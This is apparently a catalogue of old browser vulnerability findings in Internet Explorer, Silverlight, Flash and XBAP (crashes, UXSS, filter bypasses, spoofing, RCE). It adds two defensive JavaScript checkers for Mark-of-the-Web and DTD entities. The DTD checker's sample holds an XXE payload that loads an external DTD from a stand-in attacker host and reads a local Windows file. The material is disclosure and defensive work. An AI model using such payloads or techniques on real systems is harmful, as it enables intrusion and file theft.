A collection of browser security findings covering Internet Explorer (IE7 and IE8), Silverlight 3, Flash, and WPF browser-hosted applications (XBAP). The entries span DoS and crash conditions, UXSS, XSS filter and X-Frame-Options bypasses, pop-up blocker bypasses, address bar spoofing, resident script, heap spray variations, and RCE.
Silverlight 3 DoS — Uncaught Exception in CallMethod
Accessing the CallMethod function on the Silverlight bridge object without arguments or in an unexpected state raises an uncaught exception that crashes the browser.
IE DoS — dataTransfer.setData with Invalid URL
Setting an invalid URL in event.dataTransfer.setData("URL", ...) during a drag operation crashes IE. The !exploitable analyzer rated this EXPLOITABLE — EIP is changed, and the DEP access violation...
Mark-of-the-Web + Flash XML to Read Local Files
A local HTML file carrying a Mark-of-the-Web (MotW) comment runs in the Internet Zone rather than the Local Machine Zone. Flash files embedded in that page inherit the Internet Zone context, and...
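The zone decision above turns on one comment at the top of the saved file. The following is an added example, not code from the original page: it parses and builds the Mark-of-the-Web comment using Microsoft's documented format (`<!-- saved from url=(NNNN)URL -->`, where NNNN is the four-digit zero-padded character count of URL and about:internet is the generic Internet Zone marker) and then classifies a file the way the entry describes. The zone mapping in zoneFor() ignores the Intranet and Trusted site lists, and treating a wrong NNNN as "no MotW" is an assumption made here, not something the page states. The sample pages are constructed.

```javascript
// Added example (not from the original page): Mark-of-the-Web parsing, generation and
// zone classification for a local HTML file.

const MOTW_RE = /<!--\s*saved from url=\((\d{4})\)(\S+?)\s*-->/i;

// Returns { url, declaredLength, lengthMatches } or null when no MotW comment is present.
function parseMotw(html) {
  const m = MOTW_RE.exec(html);
  if (!m) return null;
  const declaredLength = parseInt(m[1], 10);
  const url = m[2];
  return { url, declaredLength, lengthMatches: declaredLength === url.length };
}

// Builds a well-formed MotW comment for a URL (count is the URL's character length).
function buildMotw(url) {
  if (/\s/.test(url) || url.length > 9999) {
    throw new RangeError('MotW URL must contain no whitespace and be at most 9999 characters');
  }
  return `<!-- saved from url=(${String(url.length).padStart(4, '0')})${url} -->`;
}

// Simplified zone mapping: no MotW (or a malformed one, assumption) means Local Machine
// Zone; about:internet or an http(s) URL means Internet Zone. Intranet/Trusted lists ignored.
function zoneFor(html) {
  const motw = parseMotw(html);
  if (!motw) {
    return { zone: 'Local Machine Zone', reason: 'no Mark-of-the-Web comment' };
  }
  if (!motw.lengthMatches) {
    return { zone: 'Local Machine Zone', reason: 'MotW length does not match URL (assumed to be ignored)' };
  }
  const url = motw.url.toLowerCase();
  if (url === 'about:internet' || /^https?:\/\//.test(url)) {
    return { zone: 'Internet Zone', reason: `MotW url=${motw.url}` };
  }
  if (url.startsWith('file:')) {
    return { zone: 'Local Machine Zone', reason: `MotW url=${motw.url} is a local path` };
  }
  return { zone: 'Internet Zone', reason: `unrecognised MotW scheme in ${motw.url}, treated as Internet (assumption)` };
}

// Constructed sample: a saved page carrying a MotW with an embedded Flash object, the
// situation the entry above describes. player.swf is a placeholder name.
const SAMPLE_SAVED_PAGE = [
  '<!-- saved from url=(0014)about:internet -->',
  '<html><body>',
  '<object type="application/x-shockwave-flash" data="player.swf"></object>',
  '</body></html>',
].join('\n');

const SAMPLE_PLAIN_PAGE = '<html><body>no mark</body></html>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(zoneFor(SAMPLE_SAVED_PAGE));
  console.log(zoneFor(SAMPLE_PLAIN_PAGE));
  console.log(buildMotw('http://www.example.com/'));
}
```

The practical check is the last branch of zoneFor(): a file that opens in the Local Machine Zone without a MotW becomes Internet Zone content with one, and any plug-in content the page embeds is rendered under that zone rather than under the zone of the file on disk.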
XBAP Clipboard Hijacker
A WPF XBAP (browser-hosted application) running in Internet Explorer could access the system clipboard when it should not have been able to. The compiled clipboard_hijacker.xbap demonstrates reading...
XAML Hyperlink Cross-Origin Sub-Frame Navigation
A WPF XAML Hyperlink element with a TargetName can navigate an iframe by name — including iframes belonging to other domains — bypassing the "Allow subframes to navigate across different domains"...
Pop-up Blocker Bypass via Windows Media Player 12
The launchURL method of the Windows Media Player 12 ActiveX object bypasses IE's pop-up blocker on Windows 7. The same method with WMP 11 on XP/Vista did not reproduce, suggesting a regression...
Resident Script via Cached IFrame open Method
Saving a reference to an iframe's open method in an external popup window, then reloading the main page (destroying the iframe), leaves the cached open callable. Calling it with "about:blank" and...
IE8 DoS — Cached Image Constructor After Iframe Reload
Saving a reference to an iframe's Image constructor, reloading the iframe (which destroys the original context), and then calling new cachedImage() from the parent crashes IE8 with a...
UXSS via Silverlight Cached Method InvokeSelf
Caching a reference to an iframe's execScript method, navigating the iframe to a cross-origin page, and then invoking the cached method via Silverlight's ScriptObject.CallMethod bypasses the...
Silverlight 3 DoS — Destroy Control While Update Dialog Is Open
Destroying the Silverlight control (via outerHTML replacement) while the Silverlight update modal dialog is open crashes the browser regardless of how the dialog is closed afterward.
Silverlight 3 DoS — Destroy Object During Install Dialog
Destroying the Silverlight OBJECT element via outerHTML while the install dialog is present (and the main thread is frozen) crashes the browser. The onMainThreadFrozen helper detects when the main...
Silverlight 3 DoS — Source Change on FullScreenChanged Event
Changing the Source property of the Silverlight object when the OnFullScreenChanged event fires crashes the browser. The new source value does not matter — even an empty string is sufficient.
Silverlight 3 DoS — SplashScreenSource Null Pointer Dereference
Using the SplashScreenSource parameter with the same .xap file as the source parameter in a Silverlight 3 control triggers a null pointer dereference on load.
Flash getURL Cross-Origin Sub-Frame Navigation
Flash's getURL method can navigate frames by name, including frames that belong to other domains. By assigning a name to a cross-origin iframe through JavaScript (which was apparently allowed at the...
IE8 DoS — XAML insertObject Crash
Loading a XAML file that uses the insertObject mechanism while an empty iframe is present triggers a crash in IE8.
IE8 XSS Filter Bypass via Injected Referrer Link
The IE8 XSS filter skips its checks when the request's referrer is the same domain as the target URL. By injecting a link in the first request that points back to the same vulnerable endpoint — with...
IE Resident Script via createElement OBJECT Self-Reference
Creating an <object type="text/html"> element with createElement and then storing a reference to that element inside its own document's window keeps the element alive indefinitely — even after the...
IE8 defineProperty Intercepts Internal Dialogs for Address Bar Spoofing
IE8's Object.defineProperty can override members that IE's own internal dialogs access on the page's document. When the Print Preview dialog reads document.documentElement, our getter fires — and...
UXSS — IE8 defineProperty Accessor Survives Cross-Origin Redirect
This builds on the delayed-redirect variable injection (entry #23) by using Object.defineProperty to install a getter accessor on a cross-origin window's document object. The accessor persists...
Pseudo-UXSS — Injecting Variables into a Cross-Origin Window via Delayed Redirect
Opening a new window to a same-domain page that performs a server-side redirect to a different domain leaves a window of time during which JavaScript variables set on the new window persist — even...
IE8 DoS — Prototype Property Crash on Properties Dialog
Setting any property on the prototype of any HTML element type causes IE8 to crash when the File → Properties dialog is opened. The crash can be triggered without user interaction by using ExecWB to...
Resident Script via Self-Pointing htmlFile
A script running inside an htmlFile ActiveX document can be made resident simply by storing a reference to the htmlFile object inside its own window. This creates a circular reference that prevents...
Resident Script via WebSlice XAML Frame
A setInterval placed inside a XAML Frame element (loaded via a WebSlice) keeps running even after the WebSlice is closed, because the PresentationHost.exe process remains resident in memory. The...
DoS — X-Frame-Options Reload Crash
Loading a page with an X-Frame-Options header inside an iframe and triggering a reload crashes IE8.
DoS — X-Frame-Options Location Navigation Crash
Navigating an iframe's location to a page with an X-Frame-Options header via script crashes IE.
DoS — htmlFile with Invalid Protocol and WMP launchURL
Two denial-of-service conditions in IE7 and IE8 triggered through the htmlFile ActiveX object.
Address Bar Spoofing and About:Tabs Exploitation via res:// Domain
This builds on the offsetParent UXSS (entry #16) to reach the res://ieframe.dll zone. Once inside that zone, two things become possible: spoofing the address bar using dnserror.htm#arbitrary-url, and...
UXSS via offsetParent as frameElement
I was lucky to find this one. A page with a <!DOCTYPE> declaration exposes document.all[0] as the DOCTYPE node, and that node's offsetParent is the hosting iframe element — even when that iframe...
RCE via Windows Desktop Search
Windows Desktop Search opened HTML result pages in a context where navigating location to a local executable path would launch that executable. The fix required restricting the zone or navigation...
UXSS via setCapture and offsetParent (Superseded)
This was an early version of a cross-origin technique later superseded by entry #16. The approach loads a non-HTML file (feeds XML, MHT, SWF, XAML, etc.) into an iframe nested inside a cross-origin...
IE8 X-Frame-Options Header Bypass
Two approaches bypassed the X-Frame-Options: DENY header in IE8. The first uses a XAML Frame element as the embedding container; the second delays the insertion of an HTML OBJECT element via...
IE8 RCE via About Dialog _unspecifiedFrame (IE8 Variation)
This is the IE8 variation of the _unspecifiedFrame About dialog attack. The IE7 version used a direct window.open to hijack the frame; IE8 blocked that approach, so the method switches to Windows...
DoS: Reusing a Cached window.open Reference After Navigation
While revisiting the cached window.open technique, I found that invoking the stale method twice in quick succession — after it had already been used to navigate the ghost iframe — was enough to crash...
Heap Spray Variations — ADO Object and Tabular Data Control
These are two variations of a heap spray technique, exploring different data-binding sources in place of the original XML island. Both bind an iframe's src through the datasrc/datafld mechanism, with...
IE8 DoS — Feeds XML Inside Iframe with Nested Iframe
Loading a feeds-formatted XML file inside an iframe, then overwriting its contents with another iframe via innerHTML, and finally clicking inside the new inner iframe crashes IE8.
IE8 WinOOB 1053535 Variation
This entry is a variation of WinOOB 1053535, archived as a compressed proof-of-concept. The reproduction steps and source were preserved in the zip file rather than as standalone HTML. The core issue...
IE7 DoS via ExecWB OLECMDID_GETZOOMRANGE Missing Argument
Calling ExecWB with OLECMDID_GETZOOMRANGE without the required fourth argument (a pointer) crashes IE7.
IE7 RCE via About Dialog _unspecifiedFrame
This one surprised me with how simple the entry point was. IE's About dialog opens a link in a window named _unspecifiedFrame. If an attacker pre-registers that window name, the About dialog's...
UXSS via CreateLink execCommand Across Origins
A close companion to the InsertImage finding, this one uses the CreateLink execCommand. By placing the focus in a cross-origin iframe and then invoking the command from a same-domain hidden iframe,...
Overriding document Methods to Fool IE Internal Dialogs
IE's internal dialogs (Find, Print Preview, Properties, etc.) interact with the page's document object — and since JavaScript can override that object and its members, those dialogs end up calling...
UXSS via InsertImage execCommand Across Origins
This one surprised me. The document.execCommand('InsertImage', true) call, when triggered from an iframe on a different origin, ends up inserting content into the parent document rather than the...
IE8 WinOOB 982379 — setCapture to Read WBControl Path
After playing around for a while with non-HTML content in iframes, I noticed that when IE instantiates a WebBrowser control to render something like a Flash file, that WBControl ends up as an...
IE8 Resident Script via Cached execScript (WinOOB 1004580)
This one took some time to get right. The trick is keeping a script alive even after the main page navigates away, by caching an execScript reference from an iframe — but the catch is that the cache...
IE8 WinOOB 1032522 — Flash GetURL with url: Protocol
A short one. While exploring what Flash's getURL method would accept as a target, I found that embedding a url:file:/// scheme inside the redirect string caused IE8 to handle the navigation in an...
IE8 XSS Filter Bypass via META Redirect
This was a variation on the earlier IE8 XSS filter bypass, this time using a <meta http-equiv="refresh"> redirect instead of navigating an inner iframe's location property. The filter checked whether...
Sandbox LiveLabs: Script Execution, Freezers, and Style Parser Escapes
These proof-of-concepts were written to be pasted into the LiveLabs sandbox environment (an internal IE testing harness at http://131.107.155.233/Samples/genericSample.aspx). The sandbox was supposed...
DoS: IE8 Crashes via createPopup and SCRIPT DEFER
While testing variations of another bug on IE8, I found two separate crash paths involving window.createPopup() and deferred scripts. Both were straightforward to trigger and required no user...
DoS: IE7 Crashes When Writing Flash via innerHTML on ONKEYPRESS
A quick one. Writing a Flash <object> or <embed> tag into the DOM via innerHTML during the ONKEYPRESS event would crash IE7 if the key was pressed quickly enough — typically two or three rapid...
MSRC 7930 Variation: Bypassing the October MSXML Patch via Redirect in DTD
This was a variation on an MSXML cross-domain scripting bug (MSRC 7930) originally found by Gregory Fleischer, who used XML parameter entities in a DTD to exfiltrate content from a remote URL into a...
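The technique above rests on DTD constructs that a consumer can refuse before the document ever reaches a parser. The following is an added example, not code from the original page or from the MSRC case: a pre-parse audit that flags an external DOCTYPE subset, external (SYSTEM or PUBLIC) general entities, parameter entity declarations and parameter entity references. It deliberately does not inspect or origin-check the URLs it finds, since the entry shows that a URL check can be defeated by a redirect; the only safe decision is to reject any DOCTYPE outright. The sample documents and hostnames are constructed.

```javascript
// Added example (not from the original page): detect DTD-based external fetches before
// handing untrusted XML to a parser. Regular expressions are used for the DOCTYPE
// prologue only; they are a pre-filter, not a replacement for a hardened parser config.

const DOCTYPE_RE = /<!DOCTYPE\s+([^\s\[>]+)(?:\s+(SYSTEM|PUBLIC)\s+("[^"]*"|'[^']*')(?:\s+("[^"]*"|'[^']*'))?)?\s*(\[[\s\S]*?\])?\s*>/i;
// Groups: 1 "% " for parameter entities, 2 name, 3/4 SYSTEM + uri,
// 5/6/7 PUBLIC + pubid + uri, 8 internal value.
const ENTITY_RE = /<!ENTITY\s+(%\s+)?([^\s]+)\s+(?:(SYSTEM)\s+("[^"]*"|'[^']*')|(PUBLIC)\s+("[^"]*"|'[^']*')\s+("[^"]*"|'[^']*')|("[^"]*"|'[^']*'))/gi;
const PE_REF_RE = /%([^\s;%]+);/g;

function unquote(lit) {
  return lit.slice(1, -1);
}

// Returns { hasDoctype, root?, findings, references, safeToParse }.
function auditDtd(xml) {
  const dt = DOCTYPE_RE.exec(xml);
  if (!dt) return { hasDoctype: false, findings: [], references: [], safeToParse: true };
  const [, root, kind, lit1, lit2, subset] = dt;
  const findings = [];
  const references = [];
  if (kind) {
    // PUBLIC carries a public identifier first, then the system URI; SYSTEM carries only the URI.
    const uri = kind.toUpperCase() === 'PUBLIC' ? lit2 : lit1;
    findings.push({ type: 'external-dtd', name: root, external: true, uri: uri ? unquote(uri) : null });
  }
  if (subset) {
    ENTITY_RE.lastIndex = 0;
    let m;
    while ((m = ENTITY_RE.exec(subset)) !== null) {
      const [, pct, name, sys, sysUri, pub, , pubUri] = m;
      const external = Boolean(sys || pub);
      findings.push({
        type: pct ? 'parameter-entity' : 'general-entity',
        name,
        external,
        uri: external ? unquote(sys ? sysUri : pubUri) : null,
      });
    }
    PE_REF_RE.lastIndex = 0;
    while ((m = PE_REF_RE.exec(subset)) !== null) references.push(m[1]);
  }
  // Any DOCTYPE is rejected: deciding by URL origin is what the redirect bypass defeats.
  return { hasDoctype: true, root, findings, references, safeToParse: false };
}

// Constructed samples.
const PLAIN_XML = '<?xml version="1.0"?><note><to>Tove</to></note>';

const XXE_XML = `<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % remote SYSTEM "http://attacker.test/evil.dtd">
  %remote;
  <!ENTITY local SYSTEM "file:///C:/Windows/win.ini">
  <!ENTITY greeting "hello">
]>
<data>&local;</data>`;

const EXTERNAL_DTD_XML = '<?xml version="1.0"?><!DOCTYPE data SYSTEM "http://same-origin.test/dtd/data.dtd"><data/>';

if (typeof require !== 'undefined' && require.main === module) {
  for (const doc of [PLAIN_XML, XXE_XML, EXTERNAL_DTD_XML]) {
    console.log(JSON.stringify(auditDtd(doc), null, 2));
  }
}
```

The EXTERNAL_DTD_XML case is the one that matters for the entry: its DTD URI is on a host the consumer might consider trusted, and a check that allowed it on that basis would be satisfied even though the fetch can end up somewhere else after a redirect. auditDtd() reports the URI for logging but does not let it influence safeToParse.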